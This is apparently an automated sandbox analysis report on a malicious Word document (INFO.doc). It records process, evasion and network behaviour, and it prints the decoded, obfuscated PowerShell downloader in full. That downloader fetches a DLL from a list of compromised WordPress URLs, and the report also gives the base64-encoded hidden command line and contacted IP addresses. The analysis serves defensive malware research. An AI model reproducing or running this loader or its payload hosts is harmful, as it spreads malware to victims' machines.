                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00180C18 pushfd ; retf 7_2_00180C19
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001817A1 push ds; iretd 7_2_001817A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0014FED0 push edx; ret 8_2_0014FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00131155 push ecx; ret 8_2_00131156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001321EC pushad ; ret 8_2_00132200
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00133391 push eax; iretd 8_2_001333AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00130C18 pushfd ; retf 8_2_00130C19
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001317A1 push ds; iretd 8_2_001317A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018FED0 push edx; ret 9_2_0018FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00171155 push ecx; ret 9_2_00171156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001721EC pushad ; ret 9_2_00172200
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00173391 push eax; iretd 9_2_001733AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00170C18 pushfd ; retf 9_2_00170C19
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001717A1 push ds; iretd 9_2_001717A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0018FED0 push edx; ret 10_2_0018FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00171155 push ecx; ret 10_2_00171156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001721EC pushad ; ret 10_2_00172200
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00173391 push eax; iretd 10_2_001733AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00170C18 pushfd ; retf 10_2_00170C19
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001717A1 push ds; iretd 10_2_001717A5

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jqqmr\igpp.bdm:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: INFO.docStream path 'word' entropy: 7.92117851063 (max. 8.0)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1520Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: rundll32.exe, 00000008.00000002.2113718598.00000000005E0000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h]7_2_1000A823
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 195.159.28.230 144Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.38.130.14 80Jump to behavior
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded SeT-vARiaBLe ("T4"+"Kd6") ( [Type]("{2}{3}{5}{0}{4}{1}" -F 're','rY','SY','sTe','ctO','m.Io.DI') ); SEt 428 ( [TYpe]("{3}{7}{0}{5}{6}{2}{4}{8}{1}"-f'EM.nET.','er','t','SYs','M','sERViCE','PoIN','t','aNag')) ; $Jrnzmks=$A16L + [char](33) + $Y11F;$M20M=('O1'+'8W'); (IteM ("VArIABlE:T4k"+"D"+"6") ).vAlUe::"CreAT`EdIReCt`Ory"($HOME + (('{0}'+'Snuvw2w{0'+'}V'+'46'+'51pz{0'+'}') -F[CHar]92));$E20V=(('B1'+'3')+'A'); $428::"sEcu`R`ityP`R`OTocol" = (('T'+'ls1')+'2');$E_9Q=(('G'+'91')+'N');$Wsxw52z = ('H'+('64'+'C'));$L04N=('V'+('16'+'F'));$Xdn5xhg=$HOME+(('{0}Snuvw'+'2w{0}V'+('465'+'1p')+'z{0}')-F[CHar]92)+$Wsxw52z+'.d' + 'll';$X28G=('W0'+'1E');$O338_77='h' + 'tt' + 'p';$Xap1lma=('x'+' '+('['+' sh b:'+'//')+('co'+'wor')+('k'+'ingpl')+'us'+'.'+('es'+'/w')+('p-a'+'dmin'+'/Fxm')+('ME'+'/')+'!'+'x'+' ['+' '+'sh'+(' b'+':'+'//silk'+'o')+('nbu'+'si')+'ne'+('ss.'+'m')+'a'+('t'+'rixin'+'fotec'+'hsoluti')+('on.c'+'o')+'m'+('/'+'js')+('/'+'q26')+('/!'+'x [')+' '+'sh'+(' b'+'s:/')+'/'+('bbj'+'u')+('gu'+'eter'+'ia')+('.com'+'/s6k')+('sc'+'x')+'/'+'Z'+('/!'+'x')+' ['+' '+'s'+('h'+' '+'bs:/')+'/'+('ww'+'w')+'.b'+'i'+'m'+'ce'+'p'+'ti'+('on.c'+'o')+('m/w'+'p-admin/sHy'+'5t/'+'!x ['+' '+'s'+'h b://armak')+'on'+('ar'+'ms.'+'c')+'o'+'m/'+'w'+('p-i'+'n')+('clu'+'de'+'s/fz/'+'!')+'x '+('['+' s')+('h'+' b:/'+'/al')+('u'+'g'+'rama.c')+('om'+'.')+'m'+'x'+'/'+'t/'+('2/!x'+' '+'[ sh')+(' b'+':')+('/'+'/ho')+'me'+('cass.co'+'m/'+'wp')+('-c'+'ont')+('ent'+'/iF'+'/'))."Re`Pl`ACe"(('x '+('[ sh'+'
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SeT-vARiaBLe ("T4"+"Kd6") ( [Type]("{2}{3}{5}{0}{4}{1}" -F 're','rY','SY','sTe','ctO','m.Io.DI') ); SEt 428 ( [TYpe]("{3}{7}{0}{5}{6}{2}{4}{8}{1}"-f'EM.nET.','er','t','SYs','M','sERViCE','PoIN','t','aNag')) ; $Jrnzmks=$A16L + [char](33) + $Y11F;$M20M=('O1'+'8W'); (IteM ("VArIABlE:T4k"+"D"+"6") ).vAlUe::"CreAT`EdIReCt`Ory"($HOME + (('{0}'+'Snuvw2w{0'+'}V'+'46'+'51pz{0'+'}') -F[CHar]92));$E20V=(('B1'+'3')+'A'); $428::"sEcu`R`ityP`R`OTocol" = (('T'+'ls1')+'2');$E_9Q=(('G'+'91')+'N');$Wsxw52z = ('H'+('64'+'C'));$L04N=('V'+('16'+'F'));$Xdn5xhg=$HOME+(('{0}Snuvw'+'2w{0}V'+('465'+'1p')+'z{0}')-F[CHar]92)+$Wsxw52z+'.d' + 'll';$X28G=('W0'+'1E');$O338_77='h' + 'tt' + 'p';$Xap1lma=('x'+' '+('['+' sh b:'+'//')+('co'+'wor')+('k'+'ingpl')+'us'+'.'+('es'+'/w')+('p-a'+'dmin'+'/Fxm')+('ME'+'/')+'!'+'x'+' ['+' '+'sh'+(' b'+':'+'//silk'+'o')+('nbu'+'si')+'ne'+('ss.'+'m')+'a'+('t'+'rixin'+'fotec'+'hsoluti')+('on.c'+'o')+'m'+('/'+'js')+('/'+'q26')+('/!'+'x [')+' '+'sh'+(' b'+'s:/')+'/'+('bbj'+'u')+('gu'+'eter'+'ia')+('.com'+'/s6k')+('sc'+'x')+'/'+'Z'+('/!'+'x')+' ['+' '+'s'+('h'+' '+'bs:/')+'/'+('ww'+'w')+'.b'+'i'+'m'+'ce'+'p'+'ti'+('on.c'+'o')+('m/w'+'p-admin/sHy'+'5t/'+'!x ['+' '+'s'+'h b://armak')+'on'+('ar'+'ms.'+'c')+'o'+'m/'+'w'+('p-i'+'n')+('clu'+'de'+'s/fz/'+'!')+'x '+('['+' s')+('h'+' b:/'+'/al')+('u'+'g'+'rama.c')+('om'+'.')+'m'+'x'+'/'+'t/'+('2/!x'+' '+'[ sh')+(' b'+':')+('/'+'/ho')+'me'+('cass.co'+'m/'+'wp')+('-c'+'ont')+('ent'+'/iF'+'/'))."Re`Pl`ACe"(('x '+('[ sh'+'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAe